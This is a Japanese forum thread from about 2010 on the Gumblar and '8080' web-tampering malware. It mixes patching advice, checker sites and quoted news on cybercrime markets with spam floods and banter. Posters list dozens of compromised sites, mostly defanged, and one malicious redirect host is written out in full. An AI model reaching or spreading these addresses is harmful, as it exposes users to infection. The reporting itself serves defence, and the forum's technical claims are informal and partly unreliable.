【Gumblar/GENO】Web改竄ウイルス総合スレ7【8080】

改ざんされたWebページを経由して感染するウイルスの情報・対策スレです

感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください

基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう

＊＊＊ 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ＊＊＊
＊＊＊ 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ＊＊＊
＊＊＊ 通報したら重複を防ぐために宣言すること ＊＊＊

【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ6【8080】
http://pc11.2ch.net/test/read.cgi/sec/1266494350/

Gumblar().x、8080系ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1）Microsoft Update（Windows Update）を実行しシステムを最新の状態にする
(2）Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1）Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2）「分類」の中の「JavaScript」を選択
(3）「Acrobat JavaScriptを使用」のチェックをクリア
(4）「OK」ボタンを押す


※サイトを運営されている方は、さらに次のことも実施していただきたい。

(1）管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2）改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する

【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です

■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
ttp://get.adobe.com/jp/reader/
・インストール後本体をアップデート
　ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
　編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意！)
ttp://get.adobe.com/jp/flashplayer/
ttp://www.adobe.com/jp/shockwave/download/alternates/#fp
・Flash Playerのバージョン確認
ttp://www.adobe.com/jp/software/flash/about/
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
ttp://www.adobe.com/jp/shockwave/download/alternates/#sp
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
ttp://www.java.com/ja/
・Javaのバージョン確認
ttp://www.java.com/ja/download/installed.jsp
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
ttp://www.apple.com/jp/quicktime/download/
■ RealPlayerを更新 (使っていないならアンインストール)
ttp://jp.real.com/?mode=basic

ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります

●InternetExplorer　ツール→インターネットオプション→セキュリティ→
　　レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
　　※ActiveXもOFF
●Opera　ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari　編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir　ツール→Sleipnirのオプション→ビュー（Trident）→
　　デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape　ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
　　※SP3でIE8を使うと重くなる場合、Sleipnir＆IE8Sleipnirエディション
　　　もしくはLunascape5を使うといいようです。
●Firefox　ツール→オプション→コンテンツでJavaScript有効にするをはずす

ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。

【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
ttp://www.gred.jp/
・aguse
ttp://www.aguse.net/
・WebGetter
ttp://rd.or.tp/get.php
・Dan's View Source
ttp://www.dan.co.uk/viewsource/
・Gumblar Checker 3(8080系用)
ttp://gumblar.s1.dynamitelife.net/ver3
・Gumblar.X Checker
ttp://gumblar.s1.dynamitelife.net/gumx/

以上でテンプレ終了。

>>2　修正
Gumblar().x、8080系ウイルス対処法。
↓
Gumblar(.x)、8080系ウイルス対処法。

変なとこでみすった・・・orz

>>1
■ 専ブラで右クリからの検索を有効にする方法。
設定例：JaneView

設定＞基本＞機能＞コマンド欄で
コマンド名　任意の名前
実行するコマンドに　任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
http://www.geocities.jp/nanasi_san_exe/online_help/option/function/command.html

これで専ブラから検索でチェックできるようになります。

以下がそのコマンドの一例になります。
Gumblar Checker2=http://gumblar.s1.dynamitelife.net/index.php?url=$LINK&hids=on&code=on&chk=AUTO
Gumblar Checker 3=http://gumblar.s1.dynamitelife.net/ver3/result.php?url=$LINK&hids=on&code=on&chk=AUTO
aguse.net サイト情報検索=http://www.aguse.net/result1.php?url=$LINK
飛び先のチェック=http://www.kakiko.com/check/?$LINK
WebGetterでソースを見る=http://rd.or.tp/get.php?site=$LINK&act=view
WebGetterでタグを除去してソースを見る=http://rd.or.tp/get.php?site=$LINK&act=strip
WebGetterでリンクを抽出する=http://rd.or.tp/get.php?site=$LINK&act=link
Dan's View Sourcelでソースを見る=http://www.dan.co.uk/viewsource/index.php?url=$LINK
Dr.WEB=http://online.drweb.com/result?url=$TEXT$LINK

>>4
このスレ的には関係ないから無視すること

つか>>1の＊＊＊ 通報したら重複を防ぐために宣言すること ＊＊＊って要らないでしょう
1人が通報したぐらいじゃ動かない所もある訳だし

1．ロシア（27.89％）
2．中国（26.52％）
3．米国（9.98％）
4．ブラジル（6.77％）
5．ウクライナ（5.45％）
6．英国（5.34％）
7．フランス（3.81％）
8．ドイツ（2.41％）
9．スウェーデン（1.6％）
10．スペイン（1.37％）

セキュリティ - ZDNet Japan
http://japan.zdnet.com/news/sec/story/0,2000056194,20367817,00.htm
セキュリティソフトウェアメーカーのPC Toolsによれば、
マルウェアのロシア発のマルウェアの割合は27.9％。これに対して中国の割合は26.5％。過去の調査では
世界2位になってしまった米国は今回、3位（10％弱）となった。

PC Toolsは、マルウェアをばらまく犯罪者集団Russian Business Networkが消滅したにも関わらず、ロシア
の生産量が落ちていないことを指摘している。

PC ToolsのマルウェアアナリストSergei Shevchenko氏は声明で「Russian Business Networkがいなくなった
ところに、ほかのマルウェアディストリビュータが入り込んでいる」と述べる。「結果として、過去にないくらい
多くのウイルスやスパイウェアがロシアから出てきている。そして、マルウェアの複雑さが増している」
（Shevchenko氏）

さらに、今はなきRussian Business Networkのほうが、その代わりに出てきた小規模な組織よりも追跡しや
すかったとShevchenko氏は言う。「現在は、ロシアのマルウェアホスティングサービスが、マレーシアや中国、
パナマ、シンガポール、タイ、トルコ、インドのサーバに目を向けている」

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


カスペルスキーがサイバー犯罪の最新動向を説明
Twitterのアカウント、闇市場で1000ドルで売買も

　フォロワー数やアカウントの利用スタイルによって価格は異なるが、
Twitterのアカウントは闇市場で1アカウントあたり500ドルや1000ドルで売買
されている――。そんなショッキングな数字を挙げて、最新のサイバー犯罪
の潜在的危険性について警鐘を鳴らすのは、ロシアのセキュリティ企業、カ
スペルスキーのセキュリティ研究者、ドミトリー・ベストゥージェフ氏だ。

　カスペルスキーは2010年1月28日にモスクワで記者向けの説明会を開
催。この中でベストゥージェフ氏は「あなたの値段はいくら？」（How much do
you cost？）と題した講演を行い、闇市場の生々しいデータや動向について
語った。ベストゥージェフ氏の講演を中心に、同社のセキュリティ専門家の
話をお伝えする。

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


なぜブラジルに多いのか？

サイバー犯罪者が集まる闇市場は、一般の市場とまったく同様に市場間の競
争や、価格決定のメカニズムが機能する売買市場となっている。売買の「場」と
なるWebサイトも、ちょうど広場やストリートで非合法の物品を売買するのと同様
に、常に各地の警察当局やISPとイタチごっこを繰り返している。

　新興国のISPを中心に、犯罪者は集散を繰り返し、メールアカウント、クレジット
カード番号、SNSアカウントなどを売買しているという。ホストしているISPが闇市
場を強制的にシャットダウンすることもあるが、問題はサイバー犯罪関連の法整
備が遅れているために、こうした犯罪行為に対するリスクが低くなっているケース
があることだという。例えば、銀行のアカウントやクレジットカード情報を盗み出す
「Trojan-Bankers」と呼ばれるマルウェアの発信源のトップはブラジルが26％でダ
ントツに高いが、この背後には「1931年に制定された法律で処理しているため、
初犯は無罪放免。2度目にようやく投獄される」（ベストゥージェフ氏）という事情が
あるという。

　捕捉されるリスクが低いことに加えて、高度に分業が進んでいることも、サイバー
犯罪に手を染める人が後を絶たない理由だ。コードを書くだけの人、ボットネットを
レンタルする人、マルウェアやスパムをばらまいてアカウントを集める人、実際に
銀行口座からお金を引き出す人、マネーロンダリングをする人、こうした人々を引
き合わせるオーガナイザーなどというように役割が細分化されている。コードだけ
書く人は、被害者の顔を見ることもないので、犯罪という意識も希薄になりやすい。

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


偽アンチウイルスソフトの年間被害額は1億5000万ドル

　カスペルスキーのような世界的セキュリティ企業ですら、具体的な犯罪者像や正
確な市場規模は把握していないというが、サイバー犯罪者の多くは、暴力や麻薬
取引に関係する「犯罪者」と異なり、見るからに犯罪者の風貌ではないのではない
か、という。1つの仮説は、ITのスキルはあっても職がない途上国や新興国の若者
が関与しているケースが多いのではなか、というもの。ブラジルの事例でこれが確
認されたこともあるという。

　闇市場の規模については、例えば近年被害が急増している「Fake AV」と呼ばれる
偽アンチウイルスソフトで、FBIへ寄せられた苦情を元に1億5000万ドルの被害額と
いう試算があるという。Fake AVに感染したPCにはポップアップ画面で多数のウイル
スに感染していると警告が出て、ウイルスの駆除のために正式版にアップグレード
するよう促される。Fake AVの画面は正当なアンチウイルスソフトのように見え、価格
も妥当。多くの人が被害にあっている。このFake AVは300種程度の存在が確認され
ており、そこから「最低でも1万人規模の犯罪者が関与している可能性がある」（イギ
リス担当シニア・リージョナル・リサーチャー デイビッド・エム氏）という。

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


警戒レベルが低いSNSのアカウントには高い価値

　闇市場でやり取りされる「情報」の価格はさまざまだ。例えば「クレジットカード番号
は、国やカード会社によって価格は違う」（ベストゥージェフ氏）といい、アメリカ在住者
のVISA、マスターカードなら1件当たり2ドルだが、同じカードでも英国在住者のもので
あれば4ドル、オーストラリアなら5ドル、EUなら6ドルなどとなる。ゴールドカード、プラチ
ナカードになればさらに価格は上がる。銀行のアカウントであれば、残高やログインが
確認できているかなどの条件によって、価格は数ドルから数十ドルと変わる。

　急激に狙われるようになっているのがSNSアカウントだ。カスペルスキーの調査によ
れば、2008年に約3万程度確認されていたSNSをターゲットにしたマルウェアは、2009
年に約6万と倍増したという。SNSは知人、友人、家族など信頼できる人を中心につな
がっていることが多いため、警戒感がない利用者が多い。

　このため、例えば5000ユーザーとつながったFacebookのアカウントが300ドルで売ら
れるケースや、数百程度のフォロー、フォロワーを持つTwitterの女性アカウントが数百
ドルや1000ドルで売買されるケースも確認しているという。

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


今後は地理情報を利用し、自動化された攻撃も

　高度に発達するSNSやWebサービスを利用して、今後は攻撃の「自動化」が進行する
だろう。こう予測するのは「なぜ災害はいつもあなたの都市を襲うのか？」（Why does the
disaster always strike your city？）と題した講演を行ったステファン・テナス氏だ。

　SNSでは地理情報や個人の嗜好といった情報を共有し、これが効率的なターゲット広告
というイノベーションを生み出す土壌になっているが、これは同時にサイバー犯罪者たち
にとっても利用価値の高い情報だ。

　例えば、地理情報。ユーザーの住む場所を取得し、偽のニュースサイトに掲載する速報
に、あたかもそのユーザーが住む都市で爆破事件が起こっているかのように見せることが
可能だろうという。見ている全員が、それぞれ都市名の部分だけをすり替えられたニュース
を読む。さらに、Google翻訳のAPIを利用して都市名を英語名で埋め込むようなこともできる。

　Koobfaceと呼ばれるマルウェアは、マルウェアをダウンロードさせるWebサイトへのリンク
が張られたメッセージを、Facebookのユーザーになりすまして投稿する。これをクリックした
Facebookの「友人」らは、偽のFlashプラグインへのアップデートを促されるという。このとき、
上記のような偽ニュースが使われれば、早く映像を見たいという気持ちからプラグインをダウ
ンロードする確率は上がるだろう。


　現在、SNSで広がる攻撃は、初心者ユーザーをターゲットにしていて初歩的なソーシャル
・エンジニアリングを使っているものが多いという。それでも十分に効果があるからだ。カス
ペルスキーでは、2010年にはこうした攻撃の高度化や自動化が進むと見ているという。また、
モバイル端末を狙ったモバイルボットネットの登場も時間の問題だろうと考えているという。

＠IT - アットマーク・アイティ　2010/01/31
ttp://www.atmarkit.co.jp/news/201001/31/twitter.html


一般的なインターネットユーザーの値段：920ドル

　従来、サイバー犯罪といえば銀行口座のパスワードやクレジットカード番号など直接的に
換金可能な情報が中心だった。このため、オンラインショッピングやオンラインバンキングを
利用しないPCユーザーは安全に感じているかもしれない。ところがベストゥージェフ氏は、
犯罪者にとっては狙う価値がないユーザーはいないという。

　オークションサイトやSNSのアカウントには価値があるし、アカウントが何もないとしても、ネ
ットワーク接続されたPCには犯罪者にとって利用価値がある。DDoS攻撃のボットネットとして
バルクで換金できるからだ。2009年10月から広がっているGumblarシステムも、いまや7万台
のサーバが感染した状態のまま超広帯域のボットネットを構成している。ホームPCが7万台の
ボットネットに比べて1000倍程度のDDoS攻撃の能力があることを意味する。一切人手を介さ
ずにサーバとクライアント間で巧みに自己拡大するGumblarは2009年12月に活動をやめて感
染拡大は止まっているが、大規模なDDoS攻撃に備えている可能性のほかに、闇市場で攻撃
インフラの売買を始めている可能性も考えられるという。

　ベストゥージェフ氏は講演の最後に、簡単なフォームを使って、ユーザー1人当たりが持つ情
報の値段を弾き出してみせた。メールアカウント3つ、残高が3000ドルの銀行のアカウントが1つ、
Facebookのアカウントが1つ、ブロードバンド接続のPCは2台、などと標準的なインターネットユー
ザーの有益な情報を闇市場の価格を元に計算すると、実に920ドル。闇市場においてデジタル
データは想像以上の高値で取り引されているようだ。

^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

　　　(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー(^q^)あうあうあー

※以上は人間への感染例です

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

　　アイティメディア株式会社　代表取締役社長　大槻利樹　アイティメディア株式会社　代表取締役社長　大槻利樹

ここも7スレ目で打ち止めだな、こりゃ…

良い意味でですか？

前スレで報告があったページで今もスクリプトが埋まってるのは少なくとも54
その中でgoogleセーフブラウジングが警告するのは18

>>21
IDの出ないセキュ板は荒れるからなあ
いっそインターネット板にでも移住するかね

とはいえ最近はアップデート以外の対策が難しくなってきているから
このスレの役目も終わりに近づいてるのかも知れんが

>>23
どれよ？
通報しるから列挙しる！

もう周知徹底してるから必要ないかも

>>25
増えそうだからちょっと待って

1benpi●mecha-kawa●com
1kyujin●mecha-kawa●com
15kinyu01●kyashingoo●com
18kinrpg●com
21kinyu01●kyashingoo●com
21saimu04●manjusyage●com
34di●mecha-kawa●com
54wanwanmonogatari68●info/
brownie-mart●com
camp●kanji2001●com
e-risingsun●net
ebook-style●com/modules/xfsection/index●php?
ec●uuhp●com/~chillnet
faac3020●cpinet●jp/
hanahaitatsu●com/
hout●kanji2003●com
info0825●com/horihori
jkjom●com
joseiyodwife●com
junkankangoshi●com/cat1039
kagoshima●cool●ne●jp/fantasy_17/
kateikyousi-turtle●com
kei●keita-house●com/torabaayu_kansai
kinzokunensuu●com
kinzokunensuu●com/cat993
lblgs●com/
link●sfidalife●com
manjusyage●com/
mizuhaitatsu●com
park21●wakwak●com/~enyaraya/
pc-net●webinfo●jp
pipestudio●net

seikakutest●net
shaddytoriyosesite●livedoor●biz
shogaishakoyo●com/
suemari●com/movie
sunrise●2pg●in/suzukiucar/index2●html
thismonky●com
unmeideai●com
www●1biyou●net
www●avis●ne●jp/~muranaka/
www●borneomarathon●com/jpn/home●html
www●dgnx●net/
www●g-mania●org
www●gocha-mix●net/cgi-bin/blog/
www●hct●zaq●ne●jp/cpacs503/
www●jpdrag●com
www●kadoma-c●com
www●kidscorner●jp/main●php
www●kikuyakikai●com
www●oumc-obog●com/2008/01
www●pzaki●com
www●ruco25●net
www●sesica●co●jp
www●shinnippo●co●jp/ssff/2006hiroshima/
www●sue-arc●com
www●win-win777●com/karuizawa/
www12●plala●or●jp/atakashi/sk
www13●plala●or●jp/metal-militia/
www2●odn●ne●jp/2711726/
www2●odn●ne●jp/2711726/index_02●html
www4●ocn●ne●jp/~ikl/member/index●htm
xn--com-r10es86d●jp/

>>26

63サイトのうち33サイトがデジロック

このような何ら対策を講じようとしないホスティングサービス屋は,
しかるべきところに通報し行政指導されるべきだ

その行政が穴のあいた鯖使ってるから困る

実は新コード来てるし･･･
//www●dd●iij4u●or●jp/~ceh3/span/juku/main●html
註：精神的ブラクラに注意ｗ

「.substr」が目立つ
※チェッカー3は無反応。

>>34のvirustotal
ttp://www.virustotal.com/jp/analisis/2b1cff715623cb02da57fc11fb3cecd9fbc40b69b27a73f1283b037d781294e9-1268125738
結果: 0/42 (0%)

>>34
こんな感じか
//bild-de.careerbuilder.com.bile-de.thew.ru:8080

職場のPCで無謀な事はできんので、
帰宅後に発掘作業を再開する･･･

でも、残業がががorz

そうだ、googleにスパム報告すればいいんだ・・・

>34
http://tinyurl.com/check8080
でひっかかる

一件だけ投下･･･
//www●kikuyakikai●com/index●html ←再発

>>34
何この俺得サイト

Internet Explorer の脆弱性により、リモートでコードが実行される
公開日: 2010年3月10日 | 最終更新日: 2010年3月10日
ttp://www.microsoft.com/japan/technet/security/advisory/981374.mspx

問題を緩和する要素:
Internet Explorer 8 は、この脆弱性による影響を受けません。

IE5.01とIE8は影響を受けないのか

28-29に追加
bikebikekaitori●com

firefoxに移行したから
IE削除するかな

Microsoft Updateするから残しとけ
自己責任で

狐でもマイクロソフトからあるアドオンをDLして有効化したらアップデート使えるよ?なんて名前のアドオンか忘れたけど
何時頃からかは知らんがEUのお偉いさん連中がWindowsにIEを初期付属してるのが法律違反だとかほざくからだろうけど

日本語で

スレ1からスレ5までに報告があったページで、今スクリプトが埋まってるURL
coolfocus●jp/seminar/heartful
jaguarracing●xf●cz/xmlrpc●php
mogulclub●com/BANDS_AND_GIGS/index_CIARA●html
s1●shard●jp/dreaming/
s1●shard●jp/dreaming/mitubishiucar/index●html
shop●relax-living●net/bike11/
www●elmwoodguestcottage●com/
www●hakuchi●jp/57577/
www●hakuchi●jp/OTSUYA/
www●hervochapiteaux●be
www●i-paradise5●jp/~simple/otona/index●php
www●mfreep●com

【クラウド】「gred AntiVirusアクセラレータ」ETHOSエンジンを追加し、さらにウイルス検知機能を強化
http://tsushima.2ch.net/test/read.cgi/news/1268217548/

また糞狐が釣ってるのか

Gumblar(.x)っぽいの
//www●kiyasuisan●co●jp
↓
//gabler-bayreuth●de/cgi-bin/default●php
↓
//alicosrl●it/templates/403●shtml●php
--
//gabler-bayreuth●de/
↓
//pecsa●com●pl/
↓
//seovisiongroup●com/

すっ飛ばしまくって→あふぃ＝メシウマ？

日本語でおｋ

>>52
ウィルスに感染するの？

>>40
ウイルスバスターがブロック(ｷﾘｯ

>>34
ウイルスバスター(笑)がスルー

大きなニュースが無いからつまらないな。
感染自体は広がってるんだが

感染を調べる一つの手段として
セーフモードで起動してスタートアップに何ちゃらってやつと
ファイル名を指定して実行→regeditどうたらっていうのがあったと思うのですが
あのテンプレみたいの持ってる方いましたら貼ってもらえませんか？

そんなモンテンプレみなきゃ分からんレベルなら
感染してるかと思ったら素直に再インストしろ

>>57
そんなもんあっても1週間もあればウイルスのファイル名が変わるなんてざらだから役にたたん
普段から自動起動しているファイルを調べてないやつには判別もできん
素直にクリーンインスコしろ

oimachi-chintai●com/sitemap/

まあ>>57のことだから
リカバリしてもまた感染するだろうなｗｗｗ

>>57
( ﾟДﾟ)ﾎﾟｶｰﾝ

//ggcomputer●com/index●html
「dT.prototype =」

株式会社ジェー・ディー・イー JDE
www●jde-net●co●jp/engineering/index●php

【IE 6/7の脆弱性：深刻な状況、早急に対策を〜掲示板に誘導書き込みのワナも】
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2182
>攻撃コードが公になったのは11日早朝。
>セキュリティベンダーの情報をもとに攻撃サイトが突きとめられ、
攻撃コードが拾われてしまった。
>このコードが使われると、回避策を適用していないIE 6/7では、
悪質なサイトにアクセスするだけでウイルスに感染してしまうおそれがある。
>コードは、現在も継続中のサイト改ざん攻撃にも即転用が可能で、被害が懸念される。

Ｍカフィー＼(^o^)／オワタｗ

何やってんのマカフィー

いつもどおりソースコードをコピペでパクれよ馬鹿フィー

マカフィー使ってる奴は情弱かnecユーザーかあどびの社員

アドビの社員は使ってないだろ
使ってるのはFlash Playerとか落としに行ったやつ

>>69
いや、ごめん、全部　俺のことなんだ

昔マカフィーのウィルススキャン使ってたらバグで受信トレイの中身全部消えて死にたくなった

昔のノートンでもそんなバグなかったか？

MSのでもあったろ

全然やらかした事のない
セキュリティソフトなんか
無いんじゃないの？

これどうやって自分が感染してるか確かめるんだよ？
分からなきゃ何度クリーンインストールしても一緒じゃねえか

いつもと違うプロセスがたちあがってりゃわかるだろ
そんなんで逆切れしてっからダメなんだ

>>65-68
は？

反論は文章で

なんかもう騒ぐ人も下火になったなあ

騒いでも再改ざん繰り返す業者が多いからじゃない？
しかも、対応しにくいように徐々にウィルス進化中

.htaccess改ざんに移行して見つけにくくなったのもあるんじゃない？

Evolution and threat of botnetでググれば学術記事が大量に見つかるけど
大学の研究ネタにもなってるとは知らなかったな

>>81
アンチウイルスソフトでも未対応のやつ多そう

なんにしろ対策してれば引っかからないし
ほんとの0dayなんかほとんどない
情弱以外関係ない

　　　　　　　　 ,,-―--、
　　　　　　　　|:::::::::::::;;;ﾉ　　／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　　|::::::::::(　」　＜　なんにしろ対策してれば引っかからないし
　　　　　　　　ﾉﾉﾉ　ヽ_l　　 |　ほんとの0dayなんかほとんどない
　　　　　　　,,-┴―┴- 、｜　　∩_　　情弱以外関係ない
　　　　　／,|┌-[]─┐|　＼　　( 　ﾉ＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　 　 　 / ヽ| | 　情　 | '、／＼ /　/
　 　 　/ `./| | 　弱　.|　 |＼　　　/
　 　 　＼ ヽ| lゝ 　 　|　 | 　＼__/
　　　　　＼ | ￣￣￣ 　 |
　　　　　 ⊂|＿＿＿＿__|
　　　　　　　|l＿l i　l＿l |
　　　　　　　| 　 ┬ 　　 |

癇に障ったか情弱

情弱と言うか無知なだけ
0day攻撃がしばらく問題だったんだよ

それに未修正の脆弱性もいろいろあるし
いつ攻撃されてもおかしくない

0dayの定義分かってないのか情弱

またいつ攻撃されてもおかしくないとか
現実的でないこといってびびってるのか
LANけーぶるひっこぬけ

神戸市関連のＨＰがウイルス感染、改ざん被害
ttp://www.kobe-np.co.jp/news/jiken/0002779319.shtml

糞狐はいつ攻撃されてもおかしくないな
ハイリスク報知だし

>>91
自治体は、やる気無いからなぁ
ttp://news.biglobe.ne.jp/social/699/ym_100307_6999091466.html

未だにIE6とか使ってるんだろうか

自治体関連掘り出していけばザックザック出てきそうだな。
どうせwindowsのパッチも当ててないし

自治体はその程度なのに国は今の知ったか大臣主導で情報を共有化する気だけどね。

>>96
機密情報をShareで全力共有しそうだなｗ

某ボランティア団体で活動してるが、団体所有のVistaはSP1のまんまだし
Adobe ReaderはVer.8のプレインストールのまま
Adobe Flash Player に関しては推して知るべし
つ〜かプリインストールのセキュリティソフト期限切れてるし．．．

大規模な情報流出しないと改善されなさそうだね。

>>98
Avastくらい入れてやれよ、ボランティアでw

それがねダンナ、かてて加えて
某福祉事務所のＸＰ、ＳＰ２のまんまだし
当然Adobe関連はプレインスコのままだし
それよりなによりファイアウォールもアンチウィルスすら入ってねーし
で、そのＰＣ使って障がい者相手のインターネット入門講座やるんだと

>>100
とりあえずＭＳＥ入れたら重くて使い物にならんしorz

アップデートていう概念自体を持ち合わせてないだけ

>>101
ubuntuにｼ十

>>101
金をもらうためにＰＣ+回線いれたのに
それ以上に金かけたくないってことだろ
こんなのがＮＰＯ法人になって金稼ぎしてるんだよｗｗ

新型来ないね

役所なんかもっとひどくてupdateしたりすると勝手にそんなことスンナって怒られるレベル。

去年のネットでできる確定申告なんて、
新しいjava捨ててわざわざ古いバージョン入れないと動かなかった。
判明するのに子1時間悩まされた。

そんなの役所にかぎらんだろ
勝手にされたら困る

こともある

まともに管理してるところなら多少遅くなってもUpdateする予定だから勝手にやると怒られる
管理してないところは金がかからなくて業務に支障がなければ「勝手にどうぞ」てな感じ
保守とセキュリティ対策は業務妨害とコストとしてしか見ないのが見識のない組織の現実

>>108
言葉足らずだった。

中途で役所のSEで入った友達の話。
あまりにも古い形式使っててセキュリティ的にヤバイって言って
議題に上げても一蹴。

『後から入ってきたくせに勝手にそんなことマンドクサそうなこと言い出すな！』
ってニュアンスだったそうな。

そうかそうか

>>100
ボランティアの人､あの警告音に驚くだろうなぁ･･･

avast5になって音変わったんじゃなかったっけ。

改ざんされた偽セキュリティソフトのWebページを踏んだ様で、PCを立ち上げると
「WARNING! 40 infections found!!!'」の表示が出て他へ他へ進めません。
Internet ExplorerやOutlook Expressすら立ち上げることができず困っています。

PCはだいぶ前のNEC VR770Cという一体型で、今になって使用書を良く読むと
HDDに再セットアップ用データが入っていて再セットアップ用CD-ROMが作れた
様ですが、恥ずかしながらそれもしていません。

何とかこの哀れなPCを復活させる手はないでしょうか？
蛇足ながら、窓から投げ捨てるには高層マンションの25階で危険すぎるのです。

OS買って来て入れなおせ

力一杯床に叩き付けろ

　　　　 　　　／￣￣＼
　　　　　　／　　　　 　 ＼ 　　　　　＿＿＿_
